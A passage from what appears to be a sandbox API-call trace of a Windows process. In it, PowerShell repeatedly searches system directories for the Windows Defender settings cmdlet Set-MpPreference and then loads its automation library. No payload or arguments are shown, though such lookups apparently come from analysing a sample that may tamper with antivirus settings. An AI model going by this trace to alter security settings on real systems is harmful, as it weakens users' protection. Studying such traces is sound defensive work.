lpFindFileData=0x3d1f40) returned 0xffffffff [0156.703] GetLastError () returned 0x2 [0156.703] SetErrorMode (uMode=0x1) returned 0x1 [0156.703] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.703] GetLastError () returned 0x2 [0156.703] SetErrorMode (uMode=0x1) returned 0x1 [0156.704] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.psm1", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.704] GetLastError () returned 0x2 [0156.704] SetErrorMode (uMode=0x1) returned 0x1 [0156.704] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.704] GetLastError () returned 0x2 [0156.704] SetErrorMode (uMode=0x1) returned 0x1 [0156.704] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.psd1", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.704] GetLastError () returned 0x2 [0156.704] SetErrorMode (uMode=0x1) returned 0x1 [0156.704] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.704] GetLastError () returned 0x2 [0156.704] SetErrorMode (uMode=0x1) returned 0x1 [0156.705] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.COM", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.705] GetLastError () returned 0x2 [0156.705] SetErrorMode (uMode=0x1) returned 0x1 [0156.705] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.705] GetLastError () returned 0x2 [0156.705] SetErrorMode (uMode=0x1) returned 0x1 [0156.705] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.EXE", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.705] GetLastError () returned 0x2 [0156.705] SetErrorMode (uMode=0x1) returned 0x1 [0156.705] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.705] GetLastError () returned 0x2 [0156.705] SetErrorMode (uMode=0x1) returned 0x1 [0156.705] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.BAT", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.706] GetLastError () returned 0x2 [0156.706] SetErrorMode (uMode=0x1) returned 0x1 [0156.706] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.706] GetLastError () returned 0x2 [0156.706] SetErrorMode (uMode=0x1) returned 0x1 [0156.706] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.CMD", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.706] GetLastError () returned 0x2 [0156.706] SetErrorMode (uMode=0x1) returned 0x1 [0156.706] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.706] GetLastError () returned 0x2 [0156.706] SetErrorMode (uMode=0x1) returned 0x1 [0156.706] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.VBS", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.707] GetLastError () returned 0x2 [0156.707] SetErrorMode (uMode=0x1) returned 0x1 [0156.707] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.707] GetLastError () returned 0x2 [0156.707] SetErrorMode (uMode=0x1) returned 0x1 [0156.707] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.VBE", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.707] GetLastError () returned 0x2 [0156.707] SetErrorMode (uMode=0x1) returned 0x1 [0156.707] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.707] GetLastError () returned 0x2 [0156.707] SetErrorMode (uMode=0x1) returned 0x1 [0156.707] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.JS", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.707] GetLastError () returned 0x2 [0156.708] SetErrorMode (uMode=0x1) returned 0x1 [0156.708] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.708] GetLastError () returned 0x2 [0156.708] SetErrorMode (uMode=0x1) returned 0x1 [0156.708] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.JSE", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.708] GetLastError () returned 0x2 [0156.708] SetErrorMode (uMode=0x1) returned 0x1 [0156.708] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.708] GetLastError () returned 0x2 [0156.708] SetErrorMode (uMode=0x1) returned 0x1 [0156.708] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.WSF", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.709] GetLastError () returned 0x2 [0156.709] SetErrorMode (uMode=0x1) returned 0x1 [0156.709] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.709] GetLastError () returned 0x2 [0156.709] SetErrorMode (uMode=0x1) returned 0x1 [0156.709] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.WSH", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.709] GetLastError () returned 0x2 [0156.709] SetErrorMode (uMode=0x1) returned 0x1 [0156.709] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.709] GetLastError () returned 0x2 [0156.709] SetErrorMode (uMode=0x1) returned 0x1 [0156.709] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.MSC", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.710] GetLastError () returned 0x2 [0156.710] SetErrorMode (uMode=0x1) returned 0x1 [0156.710] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.710] GetLastError () returned 0x2 [0156.710] SetErrorMode (uMode=0x1) returned 0x1 [0156.710] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.710] GetLastError () returned 0x2 [0156.710] SetErrorMode (uMode=0x1) returned 0x1 [0156.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.710] GetLastError () returned 0x2 [0156.710] SetErrorMode (uMode=0x1) returned 0x1 [0156.710] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.ps1", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.729] GetLastError () returned 0x2 [0156.729] SetErrorMode (uMode=0x1) returned 0x1 [0156.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.729] GetLastError () returned 0x2 [0156.729] SetErrorMode (uMode=0x1) returned 0x1 [0156.730] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.psm1", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.731] GetLastError () returned 0x2 [0156.731] SetErrorMode (uMode=0x1) returned 0x1 [0156.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.731] GetLastError () returned 0x2 [0156.731] SetErrorMode (uMode=0x1) returned 0x1 [0156.732] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.psd1", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.733] GetLastError () returned 0x2 [0156.733] SetErrorMode (uMode=0x1) returned 0x1 [0156.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.733] GetLastError () returned 0x2 [0156.733] SetErrorMode (uMode=0x1) returned 0x1 [0156.733] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.COM", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.735] GetLastError () returned 0x2 [0156.735] SetErrorMode (uMode=0x1) returned 0x1 [0156.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.735] GetLastError () returned 0x2 [0156.735] SetErrorMode (uMode=0x1) returned 0x1 [0156.735] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.EXE", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.737] GetLastError () returned 0x2 [0156.737] SetErrorMode (uMode=0x1) returned 0x1 [0156.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.737] GetLastError () returned 0x2 [0156.737] SetErrorMode (uMode=0x1) returned 0x1 [0156.737] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.BAT", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.739] GetLastError () returned 0x2 [0156.739] SetErrorMode (uMode=0x1) returned 0x1 [0156.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.739] GetLastError () returned 0x2 [0156.739] SetErrorMode (uMode=0x1) returned 0x1 [0156.739] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.CMD", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.741] GetLastError () returned 0x2 [0156.741] SetErrorMode (uMode=0x1) returned 0x1 [0156.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.741] GetLastError () returned 0x2 [0156.741] SetErrorMode (uMode=0x1) returned 0x1 [0156.741] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.VBS", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.743] GetLastError () returned 0x2 [0156.743] SetErrorMode (uMode=0x1) returned 0x1 [0156.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.743] GetLastError () returned 0x2 [0156.743] SetErrorMode (uMode=0x1) returned 0x1 [0156.743] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.VBE", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.745] GetLastError () returned 0x2 [0156.745] SetErrorMode (uMode=0x1) returned 0x1 [0156.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.745] GetLastError () returned 0x2 [0156.745] SetErrorMode (uMode=0x1) returned 0x1 [0156.745] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.JS", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.747] GetLastError () returned 0x2 [0156.747] SetErrorMode (uMode=0x1) returned 0x1 [0156.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.747] GetLastError () returned 0x2 [0156.747] SetErrorMode (uMode=0x1) returned 0x1 [0156.747] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.JSE", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.749] GetLastError () returned 0x2 [0156.749] SetErrorMode (uMode=0x1) returned 0x1 [0156.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.749] GetLastError () returned 0x2 [0156.749] SetErrorMode (uMode=0x1) returned 0x1 [0156.749] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.WSF", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.751] GetLastError () returned 0x2 [0156.751] SetErrorMode (uMode=0x1) returned 0x1 [0156.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.751] GetLastError () returned 0x2 [0156.751] SetErrorMode (uMode=0x1) returned 0x1 [0156.751] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.WSH", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.752] GetLastError () returned 0x2 [0156.753] SetErrorMode (uMode=0x1) returned 0x1 [0156.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.753] GetLastError () returned 0x2 [0156.753] SetErrorMode (uMode=0x1) returned 0x1 [0156.753] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.MSC", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.754] GetLastError () returned 0x2 [0156.754] SetErrorMode (uMode=0x1) returned 0x1 [0156.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.755] GetLastError () returned 0x2 [0156.755] SetErrorMode (uMode=0x1) returned 0x1 [0156.755] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.756] GetLastError () returned 0x2 [0156.756] SetErrorMode (uMode=0x1) returned 0x1 [0156.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.756] GetLastError () returned 0x2 [0156.756] SetErrorMode (uMode=0x1) returned 0x1 [0156.757] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.ps1", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.757] GetLastError () returned 0x2 [0156.757] SetErrorMode (uMode=0x1) returned 0x1 [0156.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.757] GetLastError () returned 0x2 [0156.757] SetErrorMode (uMode=0x1) returned 0x1 [0156.757] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psm1", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.757] GetLastError () returned 0x2 [0156.757] SetErrorMode (uMode=0x1) returned 0x1 [0156.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.757] GetLastError () returned 0x2 [0156.757] SetErrorMode (uMode=0x1) returned 0x1 [0156.758] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psd1", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.758] GetLastError () returned 0x2 [0156.758] SetErrorMode (uMode=0x1) returned 0x1 [0156.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.758] GetLastError () returned 0x2 [0156.758] SetErrorMode (uMode=0x1) returned 0x1 [0156.758] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.COM", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.758] GetLastError () returned 0x2 [0156.758] SetErrorMode (uMode=0x1) returned 0x1 [0156.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.758] GetLastError () returned 0x2 [0156.758] SetErrorMode (uMode=0x1) returned 0x1 [0156.759] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.EXE", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.759] GetLastError () returned 0x2 [0156.759] SetErrorMode (uMode=0x1) returned 0x1 [0156.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.759] GetLastError () returned 0x2 [0156.759] SetErrorMode (uMode=0x1) returned 0x1 [0156.759] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.BAT", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.759] GetLastError () returned 0x2 [0156.759] SetErrorMode (uMode=0x1) returned 0x1 [0156.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.759] GetLastError () returned 0x2 [0156.759] SetErrorMode (uMode=0x1) returned 0x1 [0156.760] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.CMD", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.760] GetLastError () returned 0x2 [0156.760] SetErrorMode (uMode=0x1) returned 0x1 [0156.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.760] GetLastError () returned 0x2 [0156.760] SetErrorMode (uMode=0x1) returned 0x1 [0156.760] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBS", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.760] GetLastError () returned 0x2 [0156.760] SetErrorMode (uMode=0x1) returned 0x1 [0156.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.760] GetLastError () returned 0x2 [0156.760] SetErrorMode (uMode=0x1) returned 0x1 [0156.761] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBE", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.761] GetLastError () returned 0x2 [0156.761] SetErrorMode (uMode=0x1) returned 0x1 [0156.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.761] GetLastError () returned 0x2 [0156.761] SetErrorMode (uMode=0x1) returned 0x1 [0156.761] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JS", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.761] GetLastError () returned 0x2 [0156.761] SetErrorMode (uMode=0x1) returned 0x1 [0156.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.761] GetLastError () returned 0x2 [0156.761] SetErrorMode (uMode=0x1) returned 0x1 [0156.762] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JSE", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.762] GetLastError () returned 0x2 [0156.762] SetErrorMode (uMode=0x1) returned 0x1 [0156.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.762] GetLastError () returned 0x2 [0156.762] SetErrorMode (uMode=0x1) returned 0x1 [0156.762] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSF", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.762] GetLastError () returned 0x2 [0156.762] SetErrorMode (uMode=0x1) returned 0x1 [0156.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.762] GetLastError () returned 0x2 [0156.763] SetErrorMode (uMode=0x1) returned 0x1 [0156.763] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSH", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.763] GetLastError () returned 0x2 [0156.763] SetErrorMode (uMode=0x1) returned 0x1 [0156.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.763] GetLastError () returned 0x2 [0156.763] SetErrorMode (uMode=0x1) returned 0x1 [0156.763] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.MSC", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.763] GetLastError () returned 0x2 [0156.763] SetErrorMode (uMode=0x1) returned 0x1 [0156.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.763] GetLastError () returned 0x2 [0156.763] SetErrorMode (uMode=0x1) returned 0x1 [0156.764] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.764] GetLastError () returned 0x2 [0156.764] SetErrorMode (uMode=0x1) returned 0x1 [0156.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b778, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.769] GetLastError () returned 0xcb [0156.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dce8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0156.770] GetLastError () returned 0x2 [0156.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dce87c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0156.770] GetLastError () returned 0x2 [0156.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dce87c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) 